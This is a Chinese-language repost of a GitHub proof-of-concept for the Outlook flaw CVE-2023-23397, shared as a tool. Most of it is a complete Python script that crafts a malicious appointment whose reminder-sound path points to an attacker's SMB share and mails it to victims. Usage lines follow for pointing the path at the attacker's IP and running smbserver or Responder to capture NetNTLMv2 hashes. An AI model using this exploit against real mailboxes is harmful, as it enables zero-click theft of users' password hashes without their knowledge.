项目地址

https://github.com/Trackflaw/CVE-2023-23397

CVE-2023-23397

影响 Outlook 客户端的 CVE-2023-23397 漏洞的简单而肮脏的 PoC。

描述

Outlook 缺乏对允许配置会议和约会提醒声音的用户输入的控制。事实上，攻击者能够强制受害者连接到其服务器，而无需用户进行任何操作（零点击漏洞）。

利用此漏洞的攻击者通过 SMB 请求根据受困用户的密码检索 NetNTLMv2 摘要。一旦邮件到达收件箱，请求就会被触发。

poc 是做什么的？

1. 生成的有效.msg载荷。
2. 使用自定义 SMTP 服务器通过电子邮件发送。

CVE-2023-23397.py

import smtplib, datetime, argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.utils import COMMASPACE, formatdate
from independentsoft.msg import Message

# Mail configuration : change it !
smtp_server = "mail.example.com"
smtp_port = 587

sender_email = "attacker@mail.example.com"
sender_password = "P@ssw0rd"

recipients_email = ["victim@mail.example.com"]

class Email:
    def __init__(self, smtp_server, port, username, password, recipient):
        self.smtp_server = smtp_server
        self.port = port
        self.username = username
        self.password = password
        self.recipient = recipient

    def send(self, subject, body, attachment_path):
        msg = MIMEMultipart()
        msg['From'] = self.username
        msg['To'] = COMMASPACE.join(self.recipient)
        msg['Date'] = formatdate(localtime=True)
        msg['Subject'] = subject
        
        msg.attach(MIMEText(body))

        with open(attachment_path, 'rb') as f:
            part = MIMEApplication(f.read(), Name=attachment_path)
            part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'
            msg.attach(part)

        try:
            server = smtplib.SMTP(self.smtp_server, self.port)
            server.starttls()
            server.login(self.username, self.password)
            server.sendmail(self.username, self.recipient, msg.as_string())
            server.quit()
            print("[+] Malicious appointment sent !")


        except Exception as e:
            print("[-] Error with SMTP server...", e)

parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')
parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)
args = parser.parse_args()

appointment = Message()
appointment.message_class = "IPM.Appointment"
appointment.subject = "CVE-2023-23397"
appointment.body = "New meeting now !"
appointment.location = "Paris"
appointment.appointment_start_time = datetime.datetime.now()
appointment.appointment_end_time = datetime.datetime.now()
appointment.reminder_override_default = True
appointment.reminder_sound_file = args.path
appointment.save("appointment.msg")

email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)

subject = "Hello There !"
body = "Important appointment !"
email.send(subject, body, "appointment.msg")

 

用法

在一个会话中：

python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

在第二个会话中（smbserver或responder根据需要）

smbserver.py -smb2support SHARE .

 

Demo（手动poc）

 

 

来源文章

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

标签：工具分享, POC脚本